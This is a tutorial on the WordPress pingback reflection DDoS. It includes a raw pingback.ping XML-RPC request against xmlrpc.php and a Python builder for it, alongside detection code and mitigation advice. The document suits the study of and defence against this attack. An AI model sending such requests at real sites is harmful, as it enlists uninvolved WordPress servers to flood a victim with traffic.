WordPress XMLRPC.php DDOS Attack

The Bigger They Come, The Harder They Fall

Earlier this year a vulnerability was exploited which abused the pingback feature in WordPress. A pingback.ping call makes the receiving WordPress site fetch the "source" URL it is given in order to verify the link, so an attacker who names the victim as the source turns every reachable WordPress site into a reflector that hammers the victim. I am going to show how to create a request to recreate the attack. The attack sent upwards of 400 Gbps across the internet. By comparison, your home network is, on a good day, theoretically 100 Mbps. This attack pumped 4,000 times more traffic than your home network can ever do.


I created the request in Burp Proxy:

POST /xmlrpc.php HTTP/1.0
Host: reflector.example
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://victim.example/</string></value></param>
    <param><value><string>http://reflector.example/?p=1</string></value></param>
  </params>
</methodCall>

(reflector.example is a placeholder for the WordPress site whose xmlrpc.php you are posting to; victim.example is a placeholder for the source URL that site will be made to fetch. The first parameter is the sourceURI, the second the targetURI, which must be an existing post on the reflector. Burp fills in Content-Length for you.)
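The following Python is an added example, not code from the original post. It builds the same pingback.ping request programmatically (so the body can be pasted into Burp Repeater), and it adds the check a site owner would want on the other side: parse incoming xmlrpc.php bodies and count pingback.ping calls per sourceURI host, since a reflected victim shows up hundreds of times, usually with a changing query string as a cache buster, while a real blog linking to you produces a handful. The hostnames victim.example, reflector.example and friend.example, the sample batch, and the threshold of 10 are all assumptions made up for the example.

```python
"""Build, parse and flag WordPress pingback.ping XML-RPC requests.

Added example; not from the original post. All hostnames are placeholders.
"""
import xmlrpc.client
from collections import Counter
from urllib.parse import urlparse


def build_pingback_body(source_uri: str, target_uri: str) -> str:
    """XML-RPC body for pingback.ping(sourceURI, targetURI).

    In the reflection attack sourceURI is the victim and targetURI is any
    existing post on the reflecting WordPress site; the reflector then
    fetches sourceURI to "verify" the link, and that fetch is the
    amplified traffic the victim receives.
    """
    return xmlrpc.client.dumps((source_uri, target_uri), methodname="pingback.ping")


def build_http_request(reflector_host: str, body: str) -> str:
    """Raw HTTP request text as it would be pasted into Burp Repeater."""
    return (
        "POST /xmlrpc.php HTTP/1.0\r\n"
        f"Host: {reflector_host}\r\n"
        "Content-Type: text/xml\r\n"
        f"Content-Length: {len(body.encode())}\r\n"
        "\r\n"
        f"{body}"
    )


def parse_pingback(body: str):
    """Return (source_uri, target_uri) if body is a pingback.ping call, else None."""
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception:  # malformed XML or an XML-RPC fault rather than a call
        return None
    if method != "pingback.ping" or len(params) != 2:
        return None
    return params[0], params[1]


def find_reflection_abuse(bodies, threshold=10):
    """Server-side heuristic over a batch of xmlrpc.php request bodies.

    Counts pingback.ping calls per sourceURI host and returns the hosts
    that reach the threshold: those are the URLs this site is being made
    to fetch repeatedly, i.e. the likely DDoS victims.
    """
    per_host = Counter()
    for body in bodies:
        parsed = parse_pingback(body)
        if parsed is None:
            continue
        per_host[urlparse(parsed[0]).hostname] += 1
    return {host: n for host, n in per_host.items() if n >= threshold}


def sample_requests():
    """Constructed batch (assumption): 25 reflected calls against victim.example,
    each with a different query string as a cache buster, plus 2 legitimate
    pingbacks from friend.example. Mixed with one non-pingback body."""
    target = "http://reflector.example/?p=1"
    bodies = [build_pingback_body(f"http://victim.example/?{i}", target) for i in range(25)]
    bodies += [build_pingback_body("http://friend.example/post", target)] * 2
    bodies.append("<html>not an xml-rpc call</html>")
    return bodies


if __name__ == "__main__":
    body = build_pingback_body("http://victim.example/", "http://reflector.example/?p=1")
    print(build_http_request("reflector.example", body))
    print(find_reflection_abuse(sample_requests()))
```

On the defensive side, counting per sourceURI host is only a detection heuristic; the durable fix for a site you own is to unregister pingback.ping through WordPress's xmlrpc_methods filter or to block /xmlrpc.php at the web server if you do not need XML-RPC at all.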
